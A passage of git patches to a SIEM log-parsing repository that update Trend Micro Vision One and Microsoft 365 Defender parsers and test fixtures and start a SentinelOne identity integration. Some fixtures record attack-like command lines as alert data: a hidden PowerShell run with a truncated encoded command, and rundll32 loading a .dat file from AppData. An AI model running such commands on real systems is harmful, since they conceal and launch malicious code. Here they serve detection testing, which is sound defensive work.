"email": "JOHNDOE@COMPANY.COM", - "id": "S-1-2-3", - "name": "jdoe" - }, - "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + "name": "explorer.exe", + "pid": 14616, + "start": "2024-11-12T08:47:41.952077Z" + }, + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" }, - "start": "2024-11-06T16:05:23.113802Z", - "working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office" + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json index 7acf31f01..cd2ca7981 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json @@ -29,11 +29,9 @@ } }, "process": { - "parent": { - "user": { - "domain": "autorite nt", - "name": "syst\u00e8me" - } + "user": { + "domain": "autorite nt", + "name": "syst\u00e8me" } } } diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json index 72f93da4e..c632ebbfa 100644 --- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json +++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json @@ -17,9 +17,7 @@ "action": { "properties": { "process": { - "parent": { - "LogonId": "0" - } + "LogonId": "0" } }, "type": "ScriptContent" @@ -42,9 +40,10 @@ }, "process": { "parent": { - "pid": 423638, - "start": "2024-10-22T15:09:47.165481Z" - } + "pid": 0 + }, + "pid": 423638, + "start": "2024-10-22T15:09:47.165481Z" }, "related": { "hash": [ From 3c5af0dd65f309e8d14b9d0a538745160ca82713 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Mon, 25 Nov 2024 12:09:53 +0200 Subject: [PATCH 091/150] Fixes and improvements --- .../trend-micro-vision-one/_meta/manifest.yml | 2 +- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 10 ++++++++-- .../tests/test_internal_network_scanner.json | 8 +++----- .../trend-micro-vision-one/tests/test_process.json | 12 ++++++++---- .../trend-micro-vision-one/tests/test_registry.json | 12 +++++++----- 5 files changed, 27 insertions(+), 17 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml index 8363b7b96..da8360194 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -1,7 +1,7 @@ uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 -name: Trend Micro Vision One +name: Trend Micro Vision One [BETA] slug: trend-micro-vision-one description: >- diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index a13ee54b2..3446a59f6 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -25,8 +25,6 @@ stages: - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" - organization.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" - organization.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityId }}" host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" @@ -39,6 +37,14 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" + - set: + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + + - set: + user.name: "{{final.user.id.split('\\\\')[0]}}" + user.domain: "{{final.user.id.split('\\\\')[1]}}" + filter: "{{final.user.id != null}}" + - set: process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index e6bcf0088..769477b65 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -3,7 +3,7 @@ "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" }, "expected": { - "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", "event": { "category": [ "intrusion_detection" @@ -33,10 +33,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "john\\doe", - "name": "john\\doe" - }, "process": { "command_line": "C:\\WINDOWS\\Explorer.EXE", "executable": "C:\\Windows\\explorer.exe", @@ -68,6 +64,8 @@ } }, "user": { + "domain": "doe", + "id": "john\\doe", "name": "doe" } } diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index d6ef4acd1..560c2ce13 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -33,10 +33,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "shockwave\\sam", - "name": "shockwave\\sam" - }, "process": { "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", @@ -50,6 +46,9 @@ ], "ip": [ "10.10.58.51" + ], + "user": [ + "shockwave" ] }, "rule": { @@ -62,6 +61,11 @@ "severity": "high", "status": "Open" } + }, + "user": { + "domain": "sam", + "id": "shockwave\\sam", + "name": "shockwave" } } } \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 3c32834ae..9159ec844 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -29,10 +29,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "shockwave\\sam", - "name": "shockwave\\sam" - }, "process": { "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", "parent": { @@ -52,6 +48,9 @@ "related": { "ip": [ "10.10.58.51" + ], + "user": [ + "shockwave" ] }, "rule": { @@ -68,7 +67,10 @@ } }, "user": { - "email": "support@pctutordetroit.com" + "domain": "sam", + "email": "support@pctutordetroit.com", + "id": "shockwave\\sam", + "name": "shockwave" } } } \ No newline at end of file From e93cd918eba05ba91b7e501ccd72d2f4c383c05d Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia <135212489+lvoloshyn-sekoia@users.noreply.github.com> Date: Tue, 26 Nov 2024 12:10:22 +0200 Subject: [PATCH 092/150] Update Trend Micro/trend-micro-vision-one/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 3446a59f6..09ca7f331 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -41,8 +41,8 @@ stages: user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" - set: - user.name: "{{final.user.id.split('\\\\')[0]}}" - user.domain: "{{final.user.id.split('\\\\')[1]}}" + user.name: "{{final.user.id.split('\\\\') | last}}" + user.domain: "{{final.user.id.split('\\\\') | first}}" filter: "{{final.user.id != null}}" - set: From 454ad36347fe76d2363d7652a1d1a89125f5f15c Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 26 Nov 2024 12:11:14 +0200 Subject: [PATCH 093/150] Fix tests --- .../tests/test_internal_network_scanner.json | 2 +- Trend Micro/trend-micro-vision-one/tests/test_process.json | 6 +++--- Trend Micro/trend-micro-vision-one/tests/test_registry.json | 6 +++--- 3 files changed, 7 insertions(+), 7 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index 769477b65..b31951fe2 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -64,7 +64,7 @@ } }, "user": { - "domain": "doe", + "domain": "john", "id": "john\\doe", "name": "doe" } diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 560c2ce13..9c013b1c0 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -48,7 +48,7 @@ "10.10.58.51" ], "user": [ - "shockwave" + "sam" ] }, "rule": { @@ -63,9 +63,9 @@ } }, "user": { - "domain": "sam", + "domain": "shockwave", "id": "shockwave\\sam", - "name": "shockwave" + "name": "sam" } } } \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 9159ec844..83d7e99b5 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -50,7 +50,7 @@ "10.10.58.51" ], "user": [ - "shockwave" + "sam" ] }, "rule": { @@ -67,10 +67,10 @@ } }, "user": { - "domain": "sam", + "domain": "shockwave", "email": "support@pctutordetroit.com", "id": "shockwave\\sam", - "name": "shockwave" + "name": "sam" } } } \ No newline at end of file From 0cc29cf19f55d2373a36d2a9d29729216df11881 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Wed, 27 Nov 2024 12:15:11 +0200 Subject: [PATCH 094/150] Feature: SentinelOne Singularity --- SentinelOne/identity/CHANGELOG.md | 8 +++ SentinelOne/identity/_meta/fields.yml | 39 ++++++++++ SentinelOne/identity/_meta/logo.png | Bin 0 -> 27937 bytes SentinelOne/identity/_meta/manifest.yml | 8 +++ .../identity/_meta/smart-descriptions.json | 46 ++++++++++++ SentinelOne/identity/ingest/parser.yml | 67 ++++++++++++++++++ SentinelOne/identity/tests/test_alert_1.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_10.json | 34 +++++++++ SentinelOne/identity/tests/test_alert_11.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_12.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_13.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_14.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_15.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_16.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_2.json | 22 ++++++ SentinelOne/identity/tests/test_alert_3.json | 34 +++++++++ SentinelOne/identity/tests/test_alert_4.json | 34 +++++++++ SentinelOne/identity/tests/test_alert_5.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_6.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_7.json | 49 +++++++++++++ SentinelOne/identity/tests/test_alert_8.json | 34 +++++++++ SentinelOne/identity/tests/test_alert_9.json | 34 +++++++++ 22 files changed, 850 insertions(+) create mode 100644 SentinelOne/identity/CHANGELOG.md create mode 100644 SentinelOne/identity/_meta/fields.yml create mode 100644 SentinelOne/identity/_meta/logo.png create mode 100644 SentinelOne/identity/_meta/manifest.yml create mode 100644 SentinelOne/identity/_meta/smart-descriptions.json create mode 100644 SentinelOne/identity/ingest/parser.yml create mode 100644 SentinelOne/identity/tests/test_alert_1.json create mode 100644 SentinelOne/identity/tests/test_alert_10.json create mode 100644 SentinelOne/identity/tests/test_alert_11.json create mode 100644 SentinelOne/identity/tests/test_alert_12.json create mode 100644 SentinelOne/identity/tests/test_alert_13.json create mode 100644 SentinelOne/identity/tests/test_alert_14.json create mode 100644 SentinelOne/identity/tests/test_alert_15.json create mode 100644 SentinelOne/identity/tests/test_alert_16.json create mode 100644 SentinelOne/identity/tests/test_alert_2.json create mode 100644 SentinelOne/identity/tests/test_alert_3.json create mode 100644 SentinelOne/identity/tests/test_alert_4.json create mode 100644 SentinelOne/identity/tests/test_alert_5.json create mode 100644 SentinelOne/identity/tests/test_alert_6.json create mode 100644 SentinelOne/identity/tests/test_alert_7.json create mode 100644 SentinelOne/identity/tests/test_alert_8.json create mode 100644 SentinelOne/identity/tests/test_alert_9.json diff --git a/SentinelOne/identity/CHANGELOG.md b/SentinelOne/identity/CHANGELOG.md new file mode 100644 index 000000000..11bddf32c --- /dev/null +++ b/SentinelOne/identity/CHANGELOG.md @@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] diff --git a/SentinelOne/identity/_meta/fields.yml b/SentinelOne/identity/_meta/fields.yml new file mode 100644 index 000000000..36e8acf65 --- /dev/null +++ b/SentinelOne/identity/_meta/fields.yml @@ -0,0 +1,39 @@ +sentinelone.identity.attackSurfaces: + description: '' + name: sentinelone.identity.attackSurfaces + type: keyword + +sentinelone.identity.classification: + description: '' + name: sentinelone.identity.classification + type: keyword + +sentinelone.identity.confidenceLevel: + description: '' + name: sentinelone.identity.confidenceLevel + type: keyword + +sentinelone.identity.id: + description: '' + name: sentinelone.identity.id + type: keyword + +sentinelone.identity.name: + description: '' + name: sentinelone.identity.name + type: keyword + +sentinelone.identity.result: + description: '' + name: sentinelone.identity.result + type: keyword + +sentinelone.identity.status: + description: '' + name: sentinelone.identity.status + type: keyword + +sentinelone.identity.storyLineId: + description: '' 